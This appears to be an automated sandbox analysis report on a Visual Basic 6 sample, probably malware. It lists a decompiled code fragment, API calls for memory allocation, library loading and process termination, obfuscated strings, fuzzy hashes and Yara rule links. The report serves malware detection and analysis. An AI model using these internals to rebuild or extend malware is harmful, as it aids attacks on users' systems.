				L004011DA();
				_v52 = 0x2b299e;
				_v48 = 0x7eadd8;
				 *((intOrPtr*)(_t130 + 0xc)) =  *0x4010c0;
				 *((intOrPtr*)( *_a4 + 0x704))(_a4, L"o9YGH4XNtHpCBImXjLZ2nNt991",  &_v48,  &_v36,  &_v52, 0x335dba,  &_v36,  &_v60,  &_v40, 0x476f,  &_v44, 2,  &_v36,  &_v40);
				_v28 = _v44;
				L004011D4();
				_t112 =  *((intOrPtr*)( *_a4 + 0x2b4))(_a4, 2,  &_v36,  &_v40);
				asm("fclex");
				_v64 = _t112;
				if(_v64 >= 0) {
					_v84 = _v84 & 0x00000000;
				} else {
					_push(0x2b4);
					_push(0x4020d4);
					_push(_a4);
					_push(_v64);
					L004011F2();
					_v84 = _t112;
				}
				_t115 =  *((intOrPtr*)( *_a4 + 0x6f8))(_a4);
				_v64 = _t115;
				if(_v64 >= 0) {
					_v88 = _v88 & 0x00000000;
				} else {
					_push(0x6f8);
					_push(0x402104);
					_push(_a4);
					_push(_v64);
					L004011F2();
					_v88 = _t115;
				}
				_v8 = 0;
				asm("wait");
				_push(E0040C034);
				return _t115;
			}


























                          0x0040be23
                          0x0040be32
                          0x0040be3c
                          0x0040be44
                          0x0040be47
                          0x0040be54
                          0x0040be5c
                          0x0040be67
                          0x0040be74
                          0x0040be7a
                          0x0040be7c
                          0x0040be83
                          0x0040be9f
                          0x0040be85
                          0x0040be85
                          0x0040be8a
                          0x0040be8f
                          0x0040be92
                          0x0040be95
                          0x0040be9a
                          0x0040be9a
                          0x0040beab
                          0x0040beb8
                          0x0040bed6
                          0x0040bedc
                          0x0040bee3
                          0x0040beff
                          0x0040bee5
                          0x0040bee5
                          0x0040beea
                          0x0040beef
                          0x0040bef2
                          0x0040bef5
                          0x0040befa
                          0x0040befa
                          0x0040bf06
                          0x0040bf13
                          0x0040bf23
                          0x0040bf2e
                          0x0040bf39
                          0x0040bf3e
                          0x0040bf45
                          0x0040bf71
                          0x0040bf85
                          0x0040bf8f
                          0x0040bf9d
                          0x0040bfad
                          0x0040bfb3
                          0x0040bfb5
                          0x0040bfbc
                          0x0040bfd8
                          0x0040bfbe
                          0x0040bfbe
                          0x0040bfc3
                          0x0040bfc8
                          0x0040bfcb
                          0x0040bfce
                          0x0040bfd3
                          0x0040bfd3
                          0x0040bfe4
                          0x0040bfea
                          0x0040bff1
                          0x0040c00d
                          0x0040bff3
                          0x0040bff3
                          0x0040bff8
                          0x0040bffd
                          0x0040c000
                          0x0040c003
                          0x0040c008
                          0x0040c008
                          0x0040c011
                          0x0040c018
                          0x0040c019
                          0x00000000

                          APIs
                          • __vbaChkstk.MSVBVM60(?,00401126), ref: 0040BE3C
                          • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,004020D4,0000014C), ref: 0040BE95
                          • __vbaStrCopy.MSVBVM60(00000000,004010D0,004020D4,0000014C), ref: 0040BEAB
                          • __vbaStrCopy.MSVBVM60(00000000,004010D0,004020D4,0000014C), ref: 0040BEB8
                          • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,00402104,000006FC), ref: 0040BEF5
                          • __vbaFreeStrList.MSVBVM60(00000002,?,?), ref: 0040BF13
                          • __vbaStrCopy.MSVBVM60(?,?,00401126), ref: 0040BF23
                          • __vbaStrCopy.MSVBVM60(?,?,00401126), ref: 0040BF39
                          • __vbaFreeStrList.MSVBVM60(00000002,?,?,?,002B299E,00335DBA,?,?,?,0000476F,?), ref: 0040BF9D
                          • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,004020D4,000002B4), ref: 0040BFCE
                          • __vbaHresultCheckObj.MSVBVM60(00000000,004010D0,00402104,000006F8), ref: 0040C003
                          Strings
                          • eqKIW9fmNogmTZ4tlGfq9pLYrWa2MF69OEa121, xrefs: 0040BF31
                          • o9YGH4XNtHpCBImXjLZ2nNt991, xrefs: 0040BF78
                          • MNMtjbRHx4PbamJpWQ2180, xrefs: 0040BF1B
                          • bqBgWjLCBrgJI06100, xrefs: 0040BEB0
                          • jmScNPZCAAwKcVgBIo2X100, xrefs: 0040BEA3
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: __vba$CheckCopyHresult$FreeList$Chkstk
                          • String ID: MNMtjbRHx4PbamJpWQ2180$bqBgWjLCBrgJI06100$eqKIW9fmNogmTZ4tlGfq9pLYrWa2MF69OEa121$jmScNPZCAAwKcVgBIo2X100$o9YGH4XNtHpCBImXjLZ2nNt991
                          • API String ID: 136807637-645893437
                          • Opcode ID: e164a2b189606a8831389660117d84bb35d13d4b55d18a24915d3d3119ff5a21
                          • Instruction ID: 519a5d37f5daf25abc16070865b238d90d8f52d6e4d3c1e414c6b7a1e94efcca
                          • Opcode Fuzzy Hash: e164a2b189606a8831389660117d84bb35d13d4b55d18a24915d3d3119ff5a21
                          • Instruction Fuzzy Hash: A061F471900209EFCB04DF95D985BEDBBB9FF08344F10807AFA05BA1A0D77999558F98
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D2F56, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 17libraryCOMMON
                          Download Yara Rule
                          APIs
                          • LdrInitializeThunk.NTDLL(021D157A,?,00000000,?,00000017,0000035D,?,021D39E3,?), ref: 021D3769
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: InitializeThunk
                          • String ID: ninet.dll
                          • API String ID: 2994545307-2962335871
                          • Opcode ID: 4518ea85d2ac9dadf7466eb1f9da38273d6e1b7d1fa171b52e1f8831b68927af
                          • Instruction ID: 685678d467900b97dc4a1edcc45c40ee5058a2c2067cedf58eea6dbe1658d169
                          • Opcode Fuzzy Hash: 4518ea85d2ac9dadf7466eb1f9da38273d6e1b7d1fa171b52e1f8831b68927af
                          • Instruction Fuzzy Hash: 3FD0A7B11856478FC215B668864BB973BA19F521D1B2DC49858E1CB236CF20F61AEBC3
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403BB0, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 458memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: ee27a51529d553255a0e5df47d2404c385a02f42e3a73fd186ed247afbca5910
                          • Instruction ID: 543fa372f36628f1aa98f6d776eddfbd376170e5aaa6fc3331ea6e28a99fae3b
                          • Opcode Fuzzy Hash: ee27a51529d553255a0e5df47d2404c385a02f42e3a73fd186ed247afbca5910
                          • Instruction Fuzzy Hash: 1BD15ED5A2E703C5F49365B140C547154A4EEA735A5738BBB6B23728C2A33E934B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403BD9, Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 454memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 0446e76972e4ae805771f5b609bd16d5e439379415fb27cc98bd81f862505f20
                          • Instruction ID: 84b2e7897ca596aa20df8bdb68045b0fdafeb33706d3ab2e5523f27a769e2b4a
                          • Opcode Fuzzy Hash: 0446e76972e4ae805771f5b609bd16d5e439379415fb27cc98bd81f862505f20
                          • Instruction Fuzzy Hash: 12D15ED5A2E703C5E49365B140C547154A4EEA735A5738BBB6B23728C2A33E834B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403B71, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 443memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: e64d95a40eae4fb526f579c51eec530f5906d0643ca3436f07f69aebff6c7cd9
                          • Instruction ID: af1e297680ab8320f1ed8e5527f57ac378e85804eaefb24c808ebcf20a63a9a1
                          • Opcode Fuzzy Hash: e64d95a40eae4fb526f579c51eec530f5906d0643ca3436f07f69aebff6c7cd9
                          • Instruction Fuzzy Hash: AED16DD5A2E703C5F49365B100C547154A4EEA735A5778BBB6B23728C2A33E934B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403B92, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 433memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 26f10dfbc1307f69bcf1246f3b72baa601265359a04644874a380ae699791ebf
                          • Instruction ID: c8f70a2befe2d3146102092da247e2e55b70081f6e0450f15e50d42f34d72ca4
                          • Opcode Fuzzy Hash: 26f10dfbc1307f69bcf1246f3b72baa601265359a04644874a380ae699791ebf
                          • Instruction Fuzzy Hash: E8D15DD5A2E703C5F49365B140C547154A4EEA735A5738BBB6B23728C2A33E934B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403C22, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 424memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 02db33a40cf353f277c37ff4f3124bd6a638678aca36d017eecc8512ab8e823f
                          • Instruction ID: 74306f00ae095a0a012ff5a82744488db1a2801a940f629d53b5ef637f3963f5
                          • Opcode Fuzzy Hash: 02db33a40cf353f277c37ff4f3124bd6a638678aca36d017eecc8512ab8e823f
                          • Instruction Fuzzy Hash: 71D16ED5A2E703C5E49365B140C547154A4EEA735A5778BBB6B23728C2A33E834B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403C43, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 417memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 4b80e2e0caa3b95f96c809937c38ae4ec731e1d4142ce2401a60fc8fa7dc3e7d
                          • Instruction ID: d9f6b5232ee310b46ebbe91d7dd7da64dcf36d20b152a7469316f291c2d61c15
                          • Opcode Fuzzy Hash: 4b80e2e0caa3b95f96c809937c38ae4ec731e1d4142ce2401a60fc8fa7dc3e7d
                          • Instruction Fuzzy Hash: 3CD16DD5A2E703C6E49365B140C547154A4EEA735A5738BBB6B33728C2A33E434B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403C52, Relevance: 3.4, APIs: 1, Strings: 1, Instructions: 413memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: E>
                          • API String ID: 4275171209-855000429
                          • Opcode ID: 548dfafec6ba45fd659f34f4d23e68b6bfc5f564aac0b6eaf969819023fdaea6
                          • Instruction ID: 9bb89779cbc3c21536d088364d1e18dca23c220b01f23356270f8f07bffe35f3
                          • Opcode Fuzzy Hash: 548dfafec6ba45fd659f34f4d23e68b6bfc5f564aac0b6eaf969819023fdaea6
                          • Instruction Fuzzy Hash: B2D16DD5A2E703C5E49365B140C547154A4EEE735A5738BBB6B23728C2A33E434B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00404641, Relevance: 3.2, APIs: 1, Strings: 1, Instructions: 202memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Strings
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID: i
                          • API String ID: 4275171209-3865851505
                          • Opcode ID: 73597b8f3761b9d03b6766a84c310c6a8581d4b0ff8753a3e9516656f95d3388
                          • Instruction ID: c6b09f2b99b990514ffbca78edca35c2541b70a46a65939152e73e3d93820d41
                          • Opcode Fuzzy Hash: 73597b8f3761b9d03b6766a84c310c6a8581d4b0ff8753a3e9516656f95d3388
                          • Instruction Fuzzy Hash: 565159D5A2E703C6F493A1B040C15315090EED735A5738BBB5B23B28C2A33E925B369F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D06DE, Relevance: 1.8, APIs: 1, Instructions: 336COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 6c823f37bb0def3b49f0a928c4f5590c697967edb2a6eca59939ca9cd882032d
                          • Instruction ID: ef83c19576b9dbf9b7ce523bc85d0a4ad4d96e23d79a20eb3dcf87da6b6b1ce8
                          • Opcode Fuzzy Hash: 6c823f37bb0def3b49f0a928c4f5590c697967edb2a6eca59939ca9cd882032d
                          • Instruction Fuzzy Hash: 81919F24AC0316EEEF3869648CA87FE2263DF46350FDA452ADC9A87045CB35C4C7C952
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0745, Relevance: 1.8, APIs: 1, Instructions: 275COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ec50ff2c4064affe9dec5515f8d8545d1eaa1a180a57cbb2fac4a9c3fdc034ed
                          • Instruction ID: a073c304f058659a9ca12e85f17a271484b37ede3e09ed2490ba2152f8edd9ae
                          • Opcode Fuzzy Hash: ec50ff2c4064affe9dec5515f8d8545d1eaa1a180a57cbb2fac4a9c3fdc034ed
                          • Instruction Fuzzy Hash: 0F715024AC0305FAEF3879A44CA87FE1227DF45364FDA452ADCDA97085C73984CBC912
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0778, Relevance: 1.8, APIs: 1, Instructions: 262COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: ebd16933acb390b02d2a75d4713ba9debe5ce5728264f544e86bb46cc8f95447
                          • Instruction ID: 2e173ccf0cd3e19296a94bc7acb8f5071b6c496108105ec36386d541bd9a3204
                          • Opcode Fuzzy Hash: ebd16933acb390b02d2a75d4713ba9debe5ce5728264f544e86bb46cc8f95447
                          • Instruction Fuzzy Hash: 0B715F24AC0305FAEF3839A45CA87FE1227DF45364FDA412ADC9A97085CB3984CBC913
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D07AA, Relevance: 1.8, APIs: 1, Instructions: 256COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          • Opcode ID: c0c78f03f503900b427e4e744de2ee787678735cc4429d91ecb385060542a40c
                          • Instruction ID: 586d15d8d9ee6445777eab541407409e17f36ad2fb4e0230f9e0068969959461
                          • Opcode Fuzzy Hash: c0c78f03f503900b427e4e744de2ee787678735cc4429d91ecb385060542a40c
                          • Instruction Fuzzy Hash: DD614E24AC0305FAEF3829A45CA87FE1227DF45364FDA452ADC9A96085CB3584CBC913
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D07F5, Relevance: 1.7, APIs: 1, Instructions: 241COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          • Opcode ID: 6fa35ddd9c3cd3bb89dadfe745b134589819168e5a3a51419e524b02570266c4
                          • Instruction ID: b1e001cb04089190554576d2978040662632262b1bbb837ccedeeacf5711a904
                          • Opcode Fuzzy Hash: 6fa35ddd9c3cd3bb89dadfe745b134589819168e5a3a51419e524b02570266c4
                          • Instruction Fuzzy Hash: B1615B24AC4315FEEF3829A45CA97FE1223DF46364FDA452BDC9A96095C73588CBC903
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D085E, Relevance: 1.7, APIs: 1, Instructions: 220COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: f62f9c68140feaeabb2c122767deddaa1a56a3a562d152579d6f2977842b1bfc
                          • Instruction ID: 2129e525ccfd77043748af7cb46fb7f1e303cfe67c3c71e8e8bff5f4f1ce481b
                          • Opcode Fuzzy Hash: f62f9c68140feaeabb2c122767deddaa1a56a3a562d152579d6f2977842b1bfc
                          • Instruction Fuzzy Hash: 21513924AC4305FEEF3869A45CA97FE1223DF55364FDA452ADC9A93085C73588C7CA13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D087B, Relevance: 1.7, APIs: 1, Instructions: 216COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          • Opcode ID: afc80d15fdd007288979115a3e54ef728ebe2eb03113e9dc98f4ef0c169ce30f
                          • Instruction ID: 9f419ef826f240a44de29eef287c4326581e452f1c08a6b5198cd313027ed38b
                          • Opcode Fuzzy Hash: afc80d15fdd007288979115a3e54ef728ebe2eb03113e9dc98f4ef0c169ce30f
                          • Instruction Fuzzy Hash: 97515B24AC0305FEEF3869A44CA97FE2223DF55364FDA451ADC9A93195C73988C7CA13
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D08CA, Relevance: 1.7, APIs: 1, Instructions: 204COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          • Opcode ID: bfdd7675a9a263f589ad184ad51bac0e1f45b5b2b21a2d574027683cebc0ca3e
                          • Instruction ID: 81447258a75936f5084e20c108c9d10634d4721b80df87f3ee074c99fbe9c91a
                          • Opcode Fuzzy Hash: bfdd7675a9a263f589ad184ad51bac0e1f45b5b2b21a2d574027683cebc0ca3e
                          • Instruction Fuzzy Hash: 3E515C24AC0305FEEF3869A44CA97FE2223DF55364FDA451ADC9A93185C73988C7C903
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D50FC, Relevance: 1.7, APIs: 1, Instructions: 189COMMON
                          Download Yara Rule
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoad
                          • String ID:
                          • API String ID: 1029625771-0
                          • Opcode ID: 153b07f947716a0bb16f34f3feb9c8cc1a1834bfc7d372bade31a974942b5372
                          • Instruction ID: 10670fcb4c4653346abbfd33e3376e9c51c4d714c73ec255854b1e063a847a1c
                          • Opcode Fuzzy Hash: 153b07f947716a0bb16f34f3feb9c8cc1a1834bfc7d372bade31a974942b5372
                          • Instruction Fuzzy Hash: D4514824AC5356FEEB353568AC647E722A39F123A0FD90236ECE2435C5E37884C5CA52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403CFB, Relevance: 1.7, APIs: 1, Instructions: 435memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 7b950df30c66e4959431885bbd6d04456fd3817aa8b1a04141fecf704ac3ebe2
                          • Instruction ID: 1ddb3af39e5f68418e980c264efc157fa1e8a90721bb14b07c842d73740e0b7d
                          • Opcode Fuzzy Hash: 7b950df30c66e4959431885bbd6d04456fd3817aa8b1a04141fecf704ac3ebe2
                          • Instruction Fuzzy Hash: 01C16CD5A2E703C5E49365B140C547154A4EEE735A5738BBB6B23728C2A33E439B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D0919, Relevance: 1.7, APIs: 1, Instructions: 185COMMON
                          Download Yara Rule
                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                            • Part of subcall function 021D481A: LoadLibraryA.KERNELBASE(?,082962C8,?,021D04E9,00000000,00000000,00000040,00000000,?), ref: 021D48E9
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: LibraryLoadProcessTerminate
                          • String ID:
                          • API String ID: 3349790660-0
                          • Opcode ID: 37e22b7abc1a04ec2a8ecf7d5dcf4890186f10b749a511f9b3f5dd68d4e6465d
                          • Instruction ID: 999d94d6a68c804c7a7ae8c26c9f2b888f5a96433bdc645a55bdc91d55e60d19
                          • Opcode Fuzzy Hash: 37e22b7abc1a04ec2a8ecf7d5dcf4890186f10b749a511f9b3f5dd68d4e6465d
                          • Instruction Fuzzy Hash: AA516E24AC4305FEEF3869A44CA97FE1227DF56364FDA451ADC9A92085C73984CBC903
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 00403C89, Relevance: 1.7, APIs: 1, Instructions: 419memoryCOMMON
                          Download Yara Rule
                          APIs
                          • VirtualAlloc.KERNELBASE(00000000,0000B000,FFFF9078,00000057,00000000), ref: 00404B86
                          Memory Dump Source
                          • Source File: 00000000.00000002.691791002.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                          • Associated: 00000000.00000002.691784568.0000000000400000.00000002.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691802591.000000000040D000.00000004.00020000.sdmp Download File
                          • Associated: 00000000.00000002.691808899.000000000040F000.00000002.00020000.sdmp Download File
                          Similarity
                          • API ID: AllocVirtual
                          • String ID:
                          • API String ID: 4275171209-0
                          • Opcode ID: 06a540aefe7e26bc4392cd4bbfd436b3b3d5a4ce708107b403120c8b9962f36c
                          • Instruction ID: 673fdf95fa74af57de71bec55c64f0a3daa1ad022621fd09cf331a7049499dca
                          • Opcode Fuzzy Hash: 06a540aefe7e26bc4392cd4bbfd436b3b3d5a4ce708107b403120c8b9962f36c
                          • Instruction Fuzzy Hash: 73D16CD5A2E703C5E49365B140C547154A4EEE735A5778BBB6B23728C2A33E438B328F
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Function 021D097D, Relevance: 1.7, APIs: 1, Instructions: 163COMMON
                          Download Yara Rule
                          APIs
                          • TerminateProcess.KERNELBASE(000000FF,00000000,?,?,?,?,00000539,?,?,?,-00000002,?,?,00140000,00000000,?), ref: 021D29B5
                          Memory Dump Source
                          • Source File: 00000000.00000002.692021584.00000000021D0000.00000040.00000001.sdmp, Offset: 021D0000, based on PE: false
                          Similarity
                          • API ID: ProcessTerminate
                          • String ID:
                          • API String ID: 560597551-0
                          • Opcode ID: 824429f0a954e5f9f8a782719c094cbdda625ed4afb47da9dfd762877b47e733
                          • Instruction ID: 8a5fe4f80d2cf2043c8877cdd1d45e832b50996cbb47e4e4c315f106d5866d2d
                          • Opcode Fuzzy Hash: 824429f0a954e5f9f8a782719c094cbdda625ed4afb47da9dfd762877b47e733
                          • Instruction Fuzzy Hash: 96416D24AC4305F9EF3969645CA9BFE1223DF46364FDA411ADC9E92095C739C4CBC503
                          Uniqueness

